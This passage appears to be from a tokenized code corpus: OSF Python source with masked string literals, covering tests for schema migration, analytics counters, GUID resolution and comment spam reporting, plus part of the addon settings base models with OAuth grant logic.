        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
    },
    '<STR_LIT>': {
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
    }
}


class TestMigrateSchemas(OsfTestCase):

    def _make_registration(self, schemas):
        """Create a registration and write OLD_META-style raw metadata for
        the given schema(s) directly into the node document.

        NOTE(review): returns None; setUp assigns its result to attributes
        that therefore hold None — the attributes appear unused afterward.
        """
        if not isinstance(schemas, list):
            schemas = [schemas]
        reg = factories.RegistrationFactory()
        reg.save()
        self.db['<STR_LIT>'].update(
            {'<STR_LIT>': reg._id},
            {
                '<STR_LIT>': {
                    '<STR_LIT>': {
                        to_mongo(schema.name): json.dumps(OLD_META[schema.name])
                        for schema in schemas
                    },
                    '<STR_LIT>': None
                }
            }
        )

    def setUp(self):
        super(TestMigrateSchemas, self).setUp()
        # Start from a clean, freshly ensured schema collection.
        MetaSchema.remove()
        ensure_schemas()
        self.regular_old_node = factories.NodeFactory()
        self.open_ended_schema = MetaSchema.find_one(
            Q('<STR_LIT:name>', '<STR_LIT>', SCHEMA_NAMES[<NUM_LIT:0>]) &
            Q('<STR_LIT>', '<STR_LIT>', <NUM_LIT:1>)
        )
        self.open_ended = self._make_registration(self.open_ended_schema)
        self.standard_schema = MetaSchema.find_one(
            Q('<STR_LIT:name>', '<STR_LIT>', SCHEMA_NAMES[<NUM_LIT:1>]) &
            Q('<STR_LIT>', '<STR_LIT>', <NUM_LIT:1>)
        )
        self.standard = self._make_registration(self.standard_schema)
        self.brandt_pre_schema = MetaSchema.find_one(
            Q('<STR_LIT:name>', '<STR_LIT>', SCHEMA_NAMES[<NUM_LIT:2>]) &
            Q('<STR_LIT>', '<STR_LIT>', <NUM_LIT:1>)
        )
        self.brandt_pre = self._make_registration(self.brandt_pre_schema)
        self.brandt_post_schema = MetaSchema.find_one(
            Q('<STR_LIT:name>', '<STR_LIT>', SCHEMA_NAMES[<NUM_LIT:3>]) &
            Q('<STR_LIT>', '<STR_LIT>', <NUM_LIT:1>)
        )
        self.brandt_post = self._make_registration(self.brandt_post_schema)
        # One registration carrying two schemas at once.
        self.multiple = self._make_registration([
            self.brandt_pre_schema,
            self.brandt_post_schema
        ])
        self.confirmatory_schema = MetaSchema.find_one(
            Q('<STR_LIT:name>', '<STR_LIT>', '<STR_LIT>')
        )
        self.confirmatory = self._make_registration(self.confirmatory_schema)
        # Blank the masked field on every node document before migrating.
        self.db['<STR_LIT>'].update({}, {'<STR_LIT>': {'<STR_LIT>': None}}, multi=True)

    def tearDown(self):
        super(TestMigrateSchemas, self).tearDown()
        self.db['<STR_LIT>'].remove()

    def test_prepare_nodes(self):
        prepare_nodes(self.db)
        for node in self.db['<STR_LIT>'].find():
            assert_equal(node['<STR_LIT>'], [])

    def test_migrate_registration_schemas(self):
        target_nodes = self.db['<STR_LIT>'].find({'<STR_LIT>': True})
        do_migration(_db=self.db)
        # Every migrated node should carry its old values under the new
        # per-schema layout.
        for node in target_nodes:
            for meta_schema_id in node['<STR_LIT>']:
                meta_schema = MetaSchema.load(meta_schema_id)
                old_data = OLD_META[meta_schema.name]
                for key, value in old_data.iteritems():
                    assert_equal(
                        node['<STR_LIT>'][meta_schema._id][key]['<STR_LIT:value>'],
                        value
                    )
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from nose . tools import * <EOL> from flask import Flask <EOL> from datetime import datetime <EOL> from framework import analytics , sessions <EOL> from framework . sessions import session <EOL> from tests . base import OsfTestCase <EOL> from tests . factories import UserFactory , ProjectFactory <EOL> class TestAnalytics ( OsfTestCase ) : <EOL> def test_get_total_activity_count ( self ) : <EOL> user = UserFactory ( ) <EOL> date = datetime . utcnow ( ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id ) , <NUM_LIT:0> ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id ) , user . get_activity_points ( db = self . db ) ) <EOL> analytics . increment_user_activity_counters ( user . _id , '<STR_LIT>' , date , db = self . db ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id , db = self . db ) , <NUM_LIT:1> ) <EOL> assert_equal ( analytics . get_total_activity_count ( user . _id , db = self . db ) , user . get_activity_points ( db = self . db ) ) <EOL> def test_increment_user_activity_counters ( self ) : <EOL> user = UserFactory ( ) <EOL> date = datetime . utcnow ( ) <EOL> assert_equal ( user . get_activity_points ( db = self . db ) , <NUM_LIT:0> ) <EOL> analytics . increment_user_activity_counters ( user . _id , '<STR_LIT>' , date , db = self . db ) <EOL> assert_equal ( user . get_activity_points ( db = self . db ) , <NUM_LIT:1> ) <EOL> class UpdateCountersTestCase ( OsfTestCase ) : <EOL> def setUp ( self ) : <EOL> decoratorapp = Flask ( '<STR_LIT>' ) <EOL> self . ctx = decoratorapp . test_request_context ( ) <EOL> self . ctx . push ( ) <EOL> sessions . set_session ( sessions . Session ( ) ) <EOL> def tearDown ( self ) : <EOL> self . ctx . pop ( ) <EOL> class TestUpdateCounters ( UpdateCountersTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestUpdateCounters , self ) . setUp ( ) <EOL> self . node = ProjectFactory ( ) <EOL> self . 
fid = '<STR_LIT:foo>' <EOL> self . vid = <NUM_LIT:1> <EOL> def test_update_counters_file ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> download_file_ ( node = self . node , fid = self . fid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> page = '<STR_LIT>' . format ( self . node , self . fid ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_ ( node = self . node , fid = self . fid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_update_counters_file_version ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_version_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> download_file_version_ ( node = self . node , fid = self . fid , vid = self . vid ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> page = '<STR_LIT>' . format ( self . node , self . fid , self . vid ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_version_ ( node = self . node , fid = self . fid , vid = self . vid ) <EOL> count = analytics . 
get_basic_counters ( '<STR_LIT>' . format ( self . node , self . fid , self . vid ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_get_basic_counters ( self ) : <EOL> page = '<STR_LIT>' + str ( self . node . _id ) <EOL> d = { '<STR_LIT>' : { } } <EOL> d [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:5> <EOL> d [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:3> <EOL> collection = self . db [ '<STR_LIT>' ] <EOL> collection . update ( { '<STR_LIT>' : page } , d , True , False ) <EOL> count = analytics . get_basic_counters ( page , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:3> , <NUM_LIT:5> ) ) <EOL> @ unittest . skip ( '<STR_LIT>' ) <EOL> def test_update_counters_different_files ( self ) : <EOL> @ analytics . update_counters ( '<STR_LIT>' , db = self . db ) <EOL> def download_file_ ( ** kwargs ) : <EOL> return kwargs . get ( '<STR_LIT>' ) or kwargs . get ( '<STR_LIT>' ) <EOL> fid1 = '<STR_LIT>' <EOL> fid2 = '<STR_LIT>' <EOL> download_file_ ( node = self . node , fid = fid1 ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid1 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid2 ) , db = self . db ) <EOL> assert_equal ( count , ( None , None ) ) <EOL> page = '<STR_LIT>' . format ( self . node , fid1 ) <EOL> session . data [ '<STR_LIT>' ] . append ( page ) <EOL> download_file_ ( node = self . node , fid = fid1 ) <EOL> download_file_ ( node = self . node , fid = fid2 ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid1 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> count = analytics . get_basic_counters ( '<STR_LIT>' . format ( self . node , fid2 ) , db = self . db ) <EOL> assert_equal ( count , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) </s>
# Tests for GuidStoredObject persistence and GUID URL resolution.
import mock
from nose.tools import *

from tests.base import OsfTestCase
from tests.factories import NodeFactory

from modularodm import Q
from modularodm import fields
from modularodm.storage.mongostorage import MongoStorage

from framework.mongo import database
from framework.guid.model import GuidStoredObject

from website import models


class TestGuidStoredObject(OsfTestCase):

    def test_guid_stored_object(self):
        # Minimal concrete GuidStoredObject subclass defined inline so the
        # test controls its storage and id.
        class FakeSchema(GuidStoredObject):
            _id = fields.StringField()

            @property
            def deep_url(self):
                return '<STR_LIT>'

        FakeSchema.set_storage(MongoStorage(database, '<STR_LIT>'))
        fake_guid = FakeSchema(_id='<STR_LIT>')
        fake_guid.save()
        # Saving a GuidStoredObject should create exactly one Guid record
        # pointing back at it, sharing its id.
        guids = models.Guid.find(Q('<STR_LIT>', '<STR_LIT>', '<STR_LIT>'))
        assert_equal(guids.count(), <NUM_LIT:1>)
        assert_equal(guids[<NUM_LIT:0>].referent, fake_guid)
        assert_equal(guids[<NUM_LIT:0>]._id, fake_guid._id)


class TestResolveGuid(OsfTestCase):

    def setUp(self):
        super(TestResolveGuid, self).setUp()
        self.node = NodeFactory()

    def test_resolve_guid(self):
        # The short GUID URL must render the same page as the full URL.
        res_guid = self.app.get(self.node.web_url_for('<STR_LIT>', _guid=True), auth=self.node.creator.auth)
        res_full = self.app.get(self.node.web_url_for('<STR_LIT>'), auth=self.node.creator.auth)
        assert_equal(res_guid.text, res_full.text)

    def test_resolve_guid_no_referent(self):
        # A guid whose referent was removed should produce an error status.
        guid = models.Guid.load(self.node._id)
        guid.referent = None
        guid.save()
        res = self.app.get(
            self.node.web_url_for('<STR_LIT>', _guid=True),
            auth=self.node.creator.auth,
            expect_errors=True,
        )
        assert_equal(res.status_code, <NUM_LIT>)

    @mock.patch('<STR_LIT>', None)
    def test_resolve_guid_no_url(self):
        # With the (masked) URL attribute patched to None, resolution
        # should also produce an error status.
        res = self.app.get(
            self.node.web_url_for('<STR_LIT>', _guid=True),
            auth=self.node.creator.auth,
            expect_errors=True,
        )
        assert_equal(res.status_code, <NUM_LIT>)
# Tests for the SpamMixin abuse-report / flagging state machine on comments.
from __future__ import absolute_import

from datetime import datetime

from nose.tools import *
from modularodm.exceptions import ValidationValueError, ValidationTypeError

from framework.auth import Auth

from tests.base import OsfTestCase
from tests.factories import UserFactory, CommentFactory


class TestSpamMixin(OsfTestCase):

    def setUp(self):
        super(TestSpamMixin, self).setUp()
        self.comment = CommentFactory()
        self.auth = Auth(user=self.comment.user)

    def test_report_abuse(self):
        # A report flags the comment and stores the reporter's report dict.
        user = UserFactory()
        time = datetime.utcnow()
        self.comment.report_abuse(
            user, date=time, category='<STR_LIT>', text='<STR_LIT>', save=True)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)
        equivalent = dict(
            date=time,
            category='<STR_LIT>',
            text='<STR_LIT>',
            retracted=False
        )
        assert_in(user._id, self.comment.reports)
        assert_equal(self.comment.reports[user._id], equivalent)

    def test_report_abuse_own_comment(self):
        # Reporting one's own comment raises and leaves status UNKNOWN.
        with assert_raises(ValueError):
            self.comment.report_abuse(
                self.comment.user,
                category='<STR_LIT>', text='<STR_LIT>',
                save=True
            )
        assert_equal(self.comment.spam_status, self.comment.UNKNOWN)

    def test_retract_report(self):
        # Retracting the sole report returns the status to UNKNOWN and
        # marks the stored report retracted.
        user = UserFactory()
        time = datetime.utcnow()
        self.comment.report_abuse(
            user, date=time, category='<STR_LIT>', text='<STR_LIT>', save=True
        )
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)
        self.comment.retract_report(user, save=True)
        assert_equal(self.comment.spam_status, self.comment.UNKNOWN)
        equivalent = {
            '<STR_LIT:date>': time,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT:text>': '<STR_LIT>',
            '<STR_LIT>': True
        }
        assert_in(user._id, self.comment.reports)
        assert_equal(self.comment.reports[user._id], equivalent)

    def test_retract_report_not_reporter(self):
        # Only the original reporter may retract; others raise and the
        # flag stands.
        reporter = UserFactory()
        non_reporter = UserFactory()
        self.comment.report_abuse(
            reporter, category='<STR_LIT>', text='<STR_LIT>', save=True
        )
        with assert_raises(ValueError):
            self.comment.retract_report(non_reporter, save=True)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)

    def test_retract_one_report_of_many(self):
        # With two reporters, retracting one leaves the comment FLAGGED.
        user_1 = UserFactory()
        user_2 = UserFactory()
        time = datetime.utcnow()
        self.comment.report_abuse(
            user_1, date=time, category='<STR_LIT>', text='<STR_LIT>', save=True
        )
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)
        self.comment.report_abuse(
            user_2, date=time, category='<STR_LIT>', text='<STR_LIT:all>', save=True
        )
        self.comment.retract_report(user_1, save=True)
        equivalent = {
            '<STR_LIT:date>': time,
            '<STR_LIT>': '<STR_LIT>',
            '<STR_LIT:text>': '<STR_LIT>',
            '<STR_LIT>': True
        }
        assert_in(user_1._id, self.comment.reports)
        assert_equal(self.comment.reports[user_1._id], equivalent)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)

    def test_flag_spam(self):
        self.comment.flag_spam(save=True)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)

    def test_cannot_remove_flag_not_retracted(self):
        # remove_flag is a no-op while an unretracted report exists.
        user = UserFactory()
        self.comment.report_abuse(
            user, category='<STR_LIT>', text='<STR_LIT>', save=True
        )
        self.comment.remove_flag(save=True)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)

    def test_remove_flag(self):
        self.comment.flag_spam(save=True)
        assert_equal(self.comment.spam_status, self.comment.FLAGGED)
        self.comment.remove_flag(save=True)
        assert_equal(self.comment.spam_status, self.comment.UNKNOWN)

    def test_confirm_ham(self):
        self.comment.confirm_ham(save=True)
        assert_equal(self.comment.spam_status, self.comment.HAM)

    def test_confirm_spam(self):
        self.comment.confirm_spam(save=True)
        assert_equal(self.comment.spam_status, self.comment.SPAM)

    def test_validate_reports_bad_key(self):
        # Report keys must be valid user ids; None is rejected on save.
        self.comment.reports[None] = {'<STR_LIT>': '<STR_LIT>', '<STR_LIT:text>': '<STR_LIT>'}
        with assert_raises(ValidationValueError):
            self.comment.save()

    def test_validate_reports_bad_type(self):
        # Report values must be dicts; a string is a type error on save.
        self.comment.reports[self.comment.user._id] = '<STR_LIT>'
        with assert_raises(ValidationTypeError):
            self.comment.save()

    def test_validate_reports_bad_value(self):
        # Report dicts must carry the expected keys; arbitrary keys are
        # rejected on save.
        self.comment.reports[self.comment.user._id] = {'<STR_LIT:foo>': '<STR_LIT:bar>'}
        with assert_raises(ValidationValueError):
            self.comment.save()
<s> import glob <EOL> import importlib <EOL> import mimetypes <EOL> import os <EOL> from time import sleep <EOL> from bson import ObjectId <EOL> from mako . lookup import TemplateLookup <EOL> import markupsafe <EOL> import requests <EOL> from modularodm import fields <EOL> from modularodm import Q <EOL> from framework . auth import Auth <EOL> from framework . auth . decorators import must_be_logged_in <EOL> from framework . exceptions import ( <EOL> PermissionsError , <EOL> HTTPError , <EOL> ) <EOL> from framework . mongo import StoredObject <EOL> from framework . routing import process_rules <EOL> from website import settings <EOL> from website . addons . base import serializer , logger <EOL> from website . project . model import Node , User <EOL> from website . util import waterbutler_url_for <EOL> from website . oauth . signals import oauth_complete <EOL> NODE_SETTINGS_TEMPLATE_DEFAULT = os . path . join ( <EOL> settings . TEMPLATES_PATH , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> USER_SETTINGS_TEMPLATE_DEFAULT = os . path . join ( <EOL> settings . TEMPLATES_PATH , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> lookup = TemplateLookup ( <EOL> directories = [ <EOL> settings . TEMPLATES_PATH <EOL> ] , <EOL> default_filters = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:h>' , <EOL> ] , <EOL> imports = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> def _is_image ( filename ) : <EOL> mtype , _ = mimetypes . guess_type ( filename ) <EOL> return mtype and mtype . 
startswith ( '<STR_LIT:image>' ) <EOL> class AddonConfig ( object ) : <EOL> def __init__ ( self , short_name , full_name , owners , categories , <EOL> added_default = None , added_mandatory = None , <EOL> node_settings_model = None , user_settings_model = None , include_js = None , include_css = None , <EOL> widget_help = None , views = None , configs = None , models = None , <EOL> has_hgrid_files = False , get_hgrid_data = None , max_file_size = None , high_max_file_size = None , <EOL> accept_extensions = True , <EOL> node_settings_template = None , user_settings_template = None , <EOL> ** kwargs ) : <EOL> self . models = models <EOL> self . settings_models = { } <EOL> if node_settings_model : <EOL> node_settings_model . config = self <EOL> self . settings_models [ '<STR_LIT>' ] = node_settings_model <EOL> if user_settings_model : <EOL> user_settings_model . config = self <EOL> self . settings_models [ '<STR_LIT:user>' ] = user_settings_model <EOL> self . short_name = short_name <EOL> self . full_name = full_name <EOL> self . owners = owners <EOL> self . categories = categories <EOL> self . added_default = added_default or [ ] <EOL> self . added_mandatory = added_mandatory or [ ] <EOL> if set ( self . added_mandatory ) . difference ( self . added_default ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . include_js = self . _include_to_static ( include_js or { } ) <EOL> self . include_css = self . _include_to_static ( include_css or { } ) <EOL> self . widget_help = widget_help <EOL> self . views = views or [ ] <EOL> self . configs = configs or [ ] <EOL> self . has_hgrid_files = has_hgrid_files <EOL> self . get_hgrid_data = get_hgrid_data <EOL> self . max_file_size = max_file_size <EOL> self . high_max_file_size = high_max_file_size <EOL> self . accept_extensions = accept_extensions <EOL> self . user_settings_template = user_settings_template <EOL> if not user_settings_template or not os . path . exists ( os . path . 
dirname ( user_settings_template ) ) : <EOL> self . user_settings_template = USER_SETTINGS_TEMPLATE_DEFAULT <EOL> self . node_settings_template = node_settings_template <EOL> if not node_settings_template or not os . path . exists ( os . path . dirname ( node_settings_template ) ) : <EOL> self . node_settings_template = NODE_SETTINGS_TEMPLATE_DEFAULT <EOL> template_dirs = list ( <EOL> set ( <EOL> [ <EOL> path <EOL> for path in [ os . path . dirname ( self . user_settings_template ) , os . path . dirname ( self . node_settings_template ) , settings . TEMPLATES_PATH ] <EOL> if os . path . exists ( path ) <EOL> ] <EOL> ) <EOL> ) <EOL> if template_dirs : <EOL> self . template_lookup = TemplateLookup ( <EOL> directories = template_dirs , <EOL> default_filters = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:h>' , <EOL> ] , <EOL> imports = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) <EOL> else : <EOL> self . template_lookup = None <EOL> def _static_url ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if filename . startswith ( '<STR_LIT:/>' ) : <EOL> return filename <EOL> return '<STR_LIT>' . format ( <EOL> addon = self . short_name , <EOL> filename = filename , <EOL> ) <EOL> def _include_to_static ( self , include ) : <EOL> """<STR_LIT:U+0020>""" <EOL> return { <EOL> key : [ <EOL> self . _static_url ( item ) <EOL> for item in value <EOL> ] <EOL> for key , value in include . iteritems ( ) <EOL> } <EOL> @ property <EOL> def icon ( self ) : <EOL> try : <EOL> return self . _icon <EOL> except : <EOL> static_path = os . path . join ( '<STR_LIT>' , '<STR_LIT>' , self . short_name , '<STR_LIT>' ) <EOL> static_files = glob . glob ( os . path . join ( static_path , '<STR_LIT>' ) ) <EOL> image_files = [ <EOL> os . path . split ( filename ) [ <NUM_LIT:1> ] <EOL> for filename in static_files <EOL> if _is_image ( filename ) <EOL> ] <EOL> if len ( image_files ) == <NUM_LIT:1> : <EOL> self . _icon = image_files [ <NUM_LIT:0> ] <EOL> else : <EOL> self . 
_icon = None <EOL> return self . _icon <EOL> @ property <EOL> def icon_url ( self ) : <EOL> return self . _static_url ( self . icon ) if self . icon else None <EOL> def to_json ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . short_name , <EOL> '<STR_LIT>' : self . full_name , <EOL> '<STR_LIT>' : self . short_name in settings . ADDON_CAPABILITIES , <EOL> '<STR_LIT>' : settings . ADDON_CAPABILITIES . get ( self . short_name ) , <EOL> '<STR_LIT>' : self . icon_url , <EOL> '<STR_LIT>' : '<STR_LIT>' in self . views , <EOL> '<STR_LIT>' : '<STR_LIT>' in self . views , <EOL> } <EOL> @ property <EOL> def path ( self ) : <EOL> return os . path . join ( settings . BASE_PATH , self . short_name ) <EOL> class AddonSettingsBase ( StoredObject ) : <EOL> _id = fields . StringField ( default = lambda : str ( ObjectId ( ) ) ) <EOL> deleted = fields . BooleanField ( default = False ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> def delete ( self , save = True ) : <EOL> self . deleted = True <EOL> self . on_delete ( ) <EOL> if save : <EOL> self . save ( ) <EOL> def undelete ( self , save = True ) : <EOL> self . deleted = False <EOL> self . on_add ( ) <EOL> if save : <EOL> self . save ( ) <EOL> def to_json ( self , user ) : <EOL> return { <EOL> '<STR_LIT>' : self . config . short_name , <EOL> '<STR_LIT>' : self . config . full_name , <EOL> } <EOL> def on_add ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def on_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AddonUserSettingsBase ( AddonSettingsBase ) : <EOL> owner = fields . ForeignField ( '<STR_LIT:user>' , index = True ) <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> def __repr__ ( self ) : <EOL> if self . owner : <EOL> return '<STR_LIT>' . format ( cls = self . __class__ . __name__ , uid = self . owner . _id ) <EOL> else : <EOL> return '<STR_LIT>' . format ( cls = self . __class__ . 
__name__ ) <EOL> @ property <EOL> def public_id ( self ) : <EOL> return None <EOL> @ property <EOL> def has_auth ( self ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> @ property <EOL> def nodes_authorized ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> schema = self . config . settings_models [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> return [ ] <EOL> return [ <EOL> node_addon . owner <EOL> for node_addon in schema . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , self ) ) <EOL> if node_addon . owner and not node_addon . owner . is_deleted <EOL> ] <EOL> @ property <EOL> def can_be_merged ( self ) : <EOL> return hasattr ( self , '<STR_LIT>' ) <EOL> def to_json ( self , user ) : <EOL> ret = super ( AddonUserSettingsBase , self ) . to_json ( user ) <EOL> ret [ '<STR_LIT>' ] = self . has_auth <EOL> ret . update ( { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT>' : node . _id , <EOL> '<STR_LIT:url>' : node . url , <EOL> '<STR_LIT:title>' : node . title , <EOL> '<STR_LIT>' : node . is_registration , <EOL> '<STR_LIT>' : node . api_url <EOL> } <EOL> for node in self . nodes_authorized <EOL> ] <EOL> } ) <EOL> return ret <EOL> @ oauth_complete . connect <EOL> def oauth_complete ( provider , account , user ) : <EOL> if not user or not account : <EOL> return <EOL> user . add_addon ( account . provider ) <EOL> user . save ( ) <EOL> class AddonOAuthUserSettingsBase ( AddonUserSettingsBase ) : <EOL> _meta = { <EOL> '<STR_LIT>' : True , <EOL> } <EOL> oauth_grants = fields . DictionaryField ( ) <EOL> oauth_provider = None <EOL> serializer = serializer . OAuthAddonSerializer <EOL> @ property <EOL> def has_auth ( self ) : <EOL> return bool ( self . external_accounts ) <EOL> @ property <EOL> def external_accounts ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> x for x in self . owner . external_accounts <EOL> if x . provider == self . oauth_provider . short_name <EOL> ] <EOL> def delete ( self , save = True ) : <EOL> for account in self . external_accounts : <EOL> self . 
revoke_oauth_access ( account , save = False ) <EOL> super ( AddonOAuthUserSettingsBase , self ) . delete ( save = save ) <EOL> def grant_oauth_access ( self , node , external_account , metadata = None ) : <EOL> """<STR_LIT>""" <EOL> if external_account not in self . owner . external_accounts : <EOL> raise PermissionsError ( ) <EOL> metadata = metadata or { } <EOL> if node . _id not in self . oauth_grants : <EOL> self . oauth_grants [ node . _id ] = { } <EOL> if external_account . _id not in self . oauth_grants [ node . _id ] : <EOL> self . oauth_grants [ node . _id ] [ external_account . _id ] = { } <EOL> for key , value in metadata . iteritems ( ) : <EOL> self . oauth_grants [ node . _id ] [ external_account . _id ] [ key ] = value <EOL> self . save ( ) <EOL> @ must_be_logged_in <EOL> def revoke_oauth_access ( self , external_account , auth , save = True ) : <EOL> """<STR_LIT>""" <EOL> for node in self . get_nodes_with_oauth_grants ( external_account ) : <EOL> try : <EOL> addon_settings = node . get_addon ( external_account . provider , deleted = True ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> addon_settings . deauthorize ( auth = auth ) <EOL> if User . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , external_account . _id ) ) . count ( ) == <NUM_LIT:1> : <EOL> self . revoke_remote_oauth_access ( external_account ) <EOL> for key in self . oauth_grants : <EOL> self . oauth_grants [ key ] . pop ( external_account . _id , None ) <EOL> if save : <EOL> self . save ( ) <EOL> def revoke_remote_oauth_access ( self , external_account ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def verify_oauth_access ( self , node , external_account , metadata = None ) : <EOL> """<STR_LIT>""" <EOL> metadata = metadata or { } <EOL> try : <EOL> grants = self . oauth_grants [ node . _id ] [ external_account . _id ] <EOL> except KeyError : <EOL> return False <EOL> for key , value in metadata . 
iteritems ( ) : <EOL> if key not in grants or grants [ key ] != value : <EOL> return False <EOL> return True <EOL> def get_nodes_with_oauth_grants ( self , external_account ) : <EOL> for node_id , grants in self . oauth_grants . iteritems ( ) : <EOL> node = Node . load ( node_id ) <EOL> if external_account . _id in grants . keys ( ) and not node . is_deleted : <EOL> yield node <EOL> def get_attached_nodes ( self , external_account ) : <EOL> for node in self . get_nodes_with_oauth_grants ( external_account ) : <EOL> if node is None : <EOL> continue <EOL> node_settings = node . get_addon ( self . oauth_provider . short_name ) <EOL> if node_settings is None : <EOL> continue <EOL> if node_settings . external_account == external_account : <EOL> yield node <EOL> def merge ( self , user_settings ) : <EOL> """<STR_LIT>""" <EOL> if user_settings . __class__ is not self . __class__ : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> for node_id , data in user_settings . oauth_grants . iteritems ( ) : <EOL> if node_id not in self . oauth_grants : <EOL> self . oauth_grants [ node_id ] = data <EOL> else : <EOL> node_grants = user_settings . oauth_grants [ node_id ] . iteritems ( ) <EOL> for ext_acct , meta in node_grants : <EOL> if ext_acct not in self . oauth_grants [ node_id ] : <EOL> self . oauth_grants [ node_id ] [ ext_acct ] = meta <EOL> else : <EOL> for k , v in meta : <EOL> if k not in self . oauth_grants [ node_id ] [ ext_acct ] : <EOL> self . oauth_grants [ node_id ] [ ext_acct ] [ k ] = v <EOL> user_settings . oauth_grants = { } <EOL> user_settings . save ( ) <EOL> try : <EOL> config = settings . ADDONS_AVAILABLE_DICT [ <EOL> self . oauth_provider . short_name <EOL> ] <EOL> Model = config . settings_models [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> connected = Model . find ( Q ( '<STR_LIT>' , '<STR_LIT>' , user_settings ) ) <EOL> for node_settings in connected : <EOL> node_settings . user_settings = self <EOL> node_settings . 
